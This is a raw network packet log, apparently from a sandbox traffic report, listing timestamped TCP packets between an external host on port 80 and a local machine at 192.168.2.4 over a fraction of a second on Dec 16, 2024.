                                                                                                                                                                                              Dec 16, 2024 01:01:27.544609070 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.544626951 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.544657946 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.544688940 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.544699907 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.544747114 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.545460939 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.545480013 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.545506001 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.545542002 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.546248913 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.547123909 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.547178984 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.547199965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.547218084 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.547246933 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.547278881 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.547940016 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.548799992 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.548816919 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.548845053 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.548877954 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.548906088 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.549138069 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.549606085 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.549653053 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.550487995 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.550506115 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.550534010 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.550565958 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.550575972 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.550618887 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.551296949 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.551350117 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.552007914 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.552056074 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.552200079 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.552217960 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.552253008 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.552253008 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.553040028 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.553056955 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.553083897 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.553116083 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.553874969 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.554692030 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.554708958 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.554740906 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.554774046 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.554784060 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.555527925 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.555545092 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.555572987 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.555604935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.556346893 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.556395054 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.557296038 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.557312965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.557362080 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.557415962 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.557463884 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.558037043 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.558096886 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.558862925 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.558908939 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.558963060 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.558980942 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.559010983 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.559042931 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.559739113 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.559786081 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.559866905 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.559914112 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.560584068 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.560600042 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.560648918 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.560681105 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.561450005 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.561465979 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.561503887 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.561544895 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.562237024 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.563040972 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.563095093 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.563142061 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.563157082 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.563189983 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.563220978 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.563950062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.564629078 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.657588005 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.657634020 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.657690048 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.657874107 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.657926083 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.658376932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.658423901 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.658756018 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.658775091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.658802032 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.658818007 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.659540892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.659595966 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.715162039 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.715291023 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.715389013 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.715420961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.715440989 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.715459108 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.715806961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.715832949 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.715854883 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.715872049 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.716476917 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.716528893 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.717159986 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.717228889 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.717247963 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.717266083 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.717294931 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.717309952 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.718002081 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.718084097 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.718410015 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.718461037 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.718827963 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.718877077 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.719002962 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.719049931 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.719669104 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.719723940 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.719799995 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.719849110 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.720511913 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.720561028 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.720652103 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.720717907 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.721409082 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.721457005 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.721935987 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.721982002 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.722170115 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.722215891 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.723032951 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.723078012 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.723134041 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.723153114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.723181009 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.723196983 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.723881960 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.723933935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.724056005 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.724103928 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.724731922 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.724807024 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.725589037 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.725605965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.725632906 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.725649118 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.725686073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.725905895 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.726474047 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.726490974 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.726524115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.726538897 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.727242947 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.727292061 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.727787971 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.727839947 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.728091955 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.728110075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.728153944 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.728952885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.728970051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.728998899 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.729013920 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.729794979 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.729811907 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.729866982 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.730640888 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.730771065 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.730954885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.730998993 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.731468916 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.731487036 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.731518984 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.731534958 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.732270002 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.732317924 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.733127117 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.733144045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.733190060 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.733237028 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.733275890 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.734004021 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.734020948 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.734054089 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.734070063 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.734853029 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.734872103 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.734898090 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.734920979 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.735651970 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.735713005 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.735783100 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.735826015 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.736525059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.736542940 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.736578941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.736598015 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.737381935 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.737400055 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.737430096 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.737446070 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.738152981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.738209963 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.739028931 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.739047050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.739097118 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.739110947 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.739152908 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.739808083 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.739860058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.740703106 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.740721941 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.740757942 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.740793943 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.740804911 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.740844965 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.741528988 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.741547108 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.741580009 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.741595984 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.742342949 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.742397070 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.742989063 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.743031979 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.743223906 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.743242025 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.743277073 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.743307114 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.744023085 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.744071960 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.744878054 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.744894981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.744925976 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.744941950 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.744975090 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.745021105 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.745727062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.745744944 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.745776892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.745793104 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.746592045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.746608973 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.746639013 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.746663094 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.747471094 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.747488976 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.747514963 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.747543097 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.748217106 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.748261929 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.748311043 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.748370886 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.749056101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.749108076 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.749166012 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.749257088 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.749943972 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.749994993 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.750073910 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.750118971 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.750756979 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.750802994 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.750859976 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.750906944 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.751589060 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.751637936 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.751704931 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.751759052 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.752461910 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.752510071 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.752593994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.752650023 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.753261089 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.753308058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.753391027 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.753436089 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.754148960 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.754198074 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.754244089 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.754292011 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.754946947 CET804980031.41.244.11192.168.2.4
